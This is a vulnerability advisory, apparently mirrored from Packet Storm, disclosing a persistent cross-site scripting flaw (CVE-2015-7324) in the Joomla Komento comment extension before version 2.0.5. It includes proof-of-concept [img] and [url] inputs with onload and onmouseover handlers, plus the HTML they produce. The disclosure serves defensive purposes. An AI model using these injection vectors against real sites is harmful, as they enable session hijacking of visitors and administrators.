Lucene search
K

Joomla Komento Cross Site Scripting

🗓️ 04 Oct 2015 00:00:00Reported by David SopasType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 32 Views

Joomla Komento Persistent XSS in Versions Prior to 2.0.

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Joomla Komento Cross Site Scripting Vulnerability
5 Oct 201500:00
zdt
CNVD
Komento Component HTML Injection Vulnerability in Joomla!
6 Nov 201500:00
cnvd
CVE
CVE-2015-7324
27 Dec 201719:00
cve
Cvelist
CVE-2015-7324
27 Dec 201719:00
cvelist
EUVD
EUVD-2015-7249
7 Oct 202500:30
euvd
NVD
CVE-2015-7324
27 Dec 201719:29
nvd
Prion
Cross site scripting
27 Dec 201719:29
prion
`CVE Reference: CVE-2015-7324  
Original advisory:  
https://www.davidsopas.com/komento-joomla-component-persistent-xss/  
Author: David Sopas @dsopas  
  
Komento is a Joomla! comment extension for articles and blogs in K2,  
EasyBlog, ZOO, Flexicontent, VirtueMart and redShop.  
  
@http://stackideas.com/komento  
  
I found out that was possible to launch a Persistent XSS attack when  
adding a new comment using the WYSIWYG website and image buttons.  
This issue was critical in both environments - frontend and backoffice.  
  
In frontend when a user visited a page where the comment has a XSS  
attack it would be automatically affected.  
In the other side - the backoffice - when the admin checked the new  
comment it would be vulnerable to this attack and could get his  
account hijacked or something even more dangerous.  
  
What I did was to pass along the XSS vector in the [img] code and use  
the Javascript onload to run the exploit when image loads.  
  
Proof-of-concept using [img]:  
[img]http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg"  
onload="prompt(1)[/img]  
  
Proof-of-concept using [url]:  
[url="https://www.davidsopas.com" onmouseover="prompt(1)"]Your text to  
link[/url]  
  
In the [img] case this will reflect the following HTML (on the frontend):  
  
<img src="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg"  
data-pagespeed-onload="prompt(1)"  
alt="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg"  
onload="prompt(1)" style="max-width:300px;max-height:300px;"  
onload="var elem=this;if (this==window)  
elem=document.body;elem.setAttribute('data-pagespeed-loaded', 1)"/>  
  
And...  
  
<img src="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg"  
data-pagespeed-onload="prompt(1)"  
alt="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg"  
onload="prompt(1)" style="max-width:300px;max-height:300px;">  
  
In the administrator area.  
  
This Joomla! component has lot’s of Google results and can affect a  
large number of innocent people. A victim just by visiting the page  
with a malicious comment will be affected.  
  
All versions prior to 2.0.5 are affected.  
Vendor already patched both security issues in the new version 2.0.5 -  
http://stackideas.com/changelog/komento  
  
-David Sopas  
davidsopas.com  
@dsopas  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation